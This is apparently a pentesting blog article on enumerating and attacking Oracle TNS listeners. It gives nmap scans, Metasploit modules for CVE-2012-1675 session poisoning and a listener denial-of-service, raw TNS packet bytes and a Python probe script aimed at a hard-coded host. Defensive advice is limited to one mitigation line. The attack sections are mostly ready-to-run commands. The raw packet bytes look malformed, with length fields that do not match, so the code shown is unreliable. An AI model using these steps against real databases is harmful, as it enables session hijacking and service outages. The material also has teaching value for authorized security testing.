Oracle TNS Listener - Port 1521,1522-1529

Basic info

Oracle databases are widely used across industries for storing sensitive enterprise data. However, their exposure to the network — especially via the Transparent Network Substrate (TNS) listener — can introduce serious security risks. Oracle TNS operates over default port 1521, but in complex environments, you may encounter instances on 1522–1529 or even beyond. This article provides in-depth techniques for enumerating, exploiting, and securing Oracle TNS listeners, with real-world examples and practical commands.

1. Understanding Oracle TNS and Default Ports

What is TNS?

TNS (Transparent Network Substrate) is Oracle’s proprietary protocol that enables communication between Oracle clients and databases across a network. It allows connections, sessions, and commands like CONNECT, DATA, RESOLVE, etc., to flow through Oracle listeners.

Default Ports

• 1521 — Primary default listener port

• 1522–1529 — Often used for additional listeners, RAC (Real Application Clusters), or other configured services

In real-world Oracle deployments, multiple listener processes may be used for load balancing, high availability, or segregation of duties across applications.

2. Common Vulnerabilities in TNS Listeners

2.1. CVE-2012–1675 — TNS Poison Attack

Description: A critical vulnerability allowing attackers to hijack database sessions by registering rogue services with the listener.

Impact: MITM attacks, data exfiltration, and full control over database traffic.

Mitigation: Use VALID_NODE_CHECKING_REGISTRATION = YES and restrict registration IPs.

2.2. No Listener Authentication

Many Oracle listeners are deployed with no password or authentication, allowing unauthenticated attackers to:

• View service names

• Stop, start, or reload the listener

• Perform Denial-of-Service (DoS) attacks

2.3. Information Disclosure via Listener STATUS

An attacker can request a STATUS command to retrieve:

• Hostnames

• Service names

• Instance names

• Database version

3. Enumeration Techniques

3.1. Nmap Scanning

Start by identifying open ports and checking for Oracle services.

nmap -sV -p 1521-1529 <target_ip>

Use the Oracle-specific NSE script:

nmap -p 1521 --script oracle-tns-version <target_ip>

3.2. Checking with Metasploit

msfconsole
use auxiliary/admin/oracle/tnslsnr_version
set RHOSTS <target_ip>
set RPORT 1521
run

Output reveals the listener version, hostname, and Oracle SID.

3.3. Using TNSping

Oracle client installations come with tnsping:

tnsping <listener_alias>

Alternatively, simulate TNSping with Python or Netcat by sending crafted TNS packets.

3.4. Manual Enumeration Using Telnet or Netcat

nc <target_ip> 1521

Send raw TNS packets:

\x00\x00\x00\x36\x01\x00\x00\x00\x01\x36\x01\x2c\x00\x00\x00\x00

You can script this using Python socket module to brute-force or enumerate SIDs.

4. Exploitation Techniques

4.1. Exploiting TNS Poison Attack (CVE-2012–1675)

Metasploit Module:

use auxiliary/admin/oracle/tnspoison
set RHOSTS <target_ip>
set RPORT 1521
run

Warning: This module may crash the listener or disrupt sessions. Use only in lab or authorized environments.

4.2. Exploiting Unauthenticated Listener Control

If listener commands like STATUS, STOP, or RELOAD are unauthenticated:

use auxiliary/admin/oracle/tnslsnr_version
use auxiliary/admin/oracle/tnslsnr_service

You can perform a Denial-of-Service:

use auxiliary/dos/oracle/tnslsnr_dos

5. Custom Python Script to Enumerate Listener Services

import socket
def send_tns_probe(ip, port):
    tns_pkt = b"\x00\x00\x00\x2a\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
    try:
        s = socket.socket()
        s.settimeout(3)
        s.connect((ip, port))
        s.send(tns_pkt)
        response = s.recv(1024)
        print(f"[+] Response from {ip}:{port}:\n{response.hex()}")
    except Exception as e:
        print(f"[-] Failed to connect to {ip}:{port} - {str(e)}")
send_tns_probe("10.0.0.25", 1523)